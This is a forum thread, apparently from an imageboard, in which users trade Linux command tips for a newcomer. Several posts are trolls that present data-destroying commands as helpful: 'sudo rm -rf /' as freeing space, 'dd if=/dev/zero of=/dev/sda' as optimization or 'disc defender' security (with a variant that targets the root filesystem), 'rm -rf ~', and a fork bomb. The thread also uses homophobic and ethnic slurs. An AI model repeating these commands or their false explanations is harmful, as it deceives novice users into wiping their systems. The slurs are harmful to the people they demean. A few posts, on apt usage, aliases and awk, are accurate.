Share your l33t Linux command

I just installed Ubuntu here.

I'm going to teach you one command:

sudo apt-get install xxxxx

xxxxx you should replace with your app name

Then you type the password you inserted when installing the system.

This will install a program.

Other urls found in this thread:

Teach me more OP.

fucking die, normie

Sudo apt-get install gf_1.02 :^(

I learned a while back that if you do `sudo rm -rf /` it will delete all proprietary software and free up space on your hd.

sudo apt-get install photoshop

fuck you faget it doesn't work

fugggg :---DDDD

i had no idea

Before anyone screems "MUH WEBSITE TOLD ME NEVER TO", Websites will get paid to print out articles in favor of propietary software,

>installing programs without searching on the web
What sorcery is this?

sudo dd if=/dev/zero of=/dev/sda bs=1M count=100000

This command optimizes your Linux installation by removing all the redundant zeroes.

I heard if you do "sudo rm -rf ~" you become homeless


Not every hd is mounted to sda

My boot times were drastically reduced using this command. I thank you,kind Sir.

>`sudo rm -rf /`
Look, a latino fag. His keyboard doesn't have the single quote key and instead the had to use the ` whatever it is calledf.

You can secure your linux system with disc defender, short: dd

Like this:

dd if=/dev/zero of=/dev/sda

The /dev/zero/ arguments means you tolerate zero deviations from the standard system, meaning any changes by potential malware will be reversed.
The /dev/sda argument is usually your system disc, you may have to change it, if your system resides elsewhere.

If you are unsure where your root filesystem resides, use this variation of the command:

dd if=/dev/zero of=$(mount | grep \ /\ | awk {'print $1'})

Congratulations, your Linux is now bullet proof.

Now my ubuntu vm won't load anymore. What did I do wrong?

Luckly I cloned it before changing anything.

tick-bang-bang-tick: `!!`
ls a*mp3
mplayer `!!`

Same fag


echo "Hello World" >| echo "Me" > out.txt

sudo apt install fish; fish


sudo apt-get install sl

then type

Grats, your computer is now infected with train

Mfw /home lives on /dev/sdb

I think that's a "back quote"

# sudo apt-get install xxxxx
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package xxxxx

Did it work? I can't tell.


Ummmm - English speaker in Spain...
What's this?

>sudo apt-get install gentoo

sick hack bro thxz

in your shell conf file make an alias

alias install='sudo apt-get install -y'

now you can just type install programName

is fish better than zsh? recently changed over to zsh. i have it doing all the fish stuff. but fish isn't posix compatible

Run this command once after each install to improve bash
cat > ~/.inputrc

This doesn't work on Arch. Is there a gf in the user repository? pls respond

Or just mplayer a*MP3

It's called package faggot

:(){ :|: & };:

>Uses Arch

The apt-get command is depreciated and you should use just apt instead. You can do a lot more with the CLI package manager than just stab around blindly for programs. If you aren't sure of the exact program name in the repositories, you can enter "sudo apt search browser" for example and it'll show everything in the repo that has the word browser in the package name or description. This list of packages is cached locally so if you want to update this list you can run "sudo apt update". To install available updates, run "sudo apt upgrade". If you're running as root you don't need sudo. I personally hate Ubuntu because it locks you out of the root account by default.

Now fuck off.

Why so mad? Your mom and fantasized girlfriend got tucked by a Pedro? :j

>sudo su

Thanks user, my computer isn't going to be running malware anytime soon now.

I think that it's better for newfags to use synaptic... Not that cli is not good, but they can learn easier to install and manage packages in the gui and blindly use the cli afterwards.

I haven't used Ubuntu but does it lock you out of even sudo su?

Why would you even think a distro will lock you from calling executables?

You just have to type sudo su and then type your password. Boom youre rooted.

awk '{print $n}'
where n is the number of the column you want to print. I see all these plebs trying to print columns using cut, specifying delimiters and having it only work 75% of the time. awk makes this shit so easy.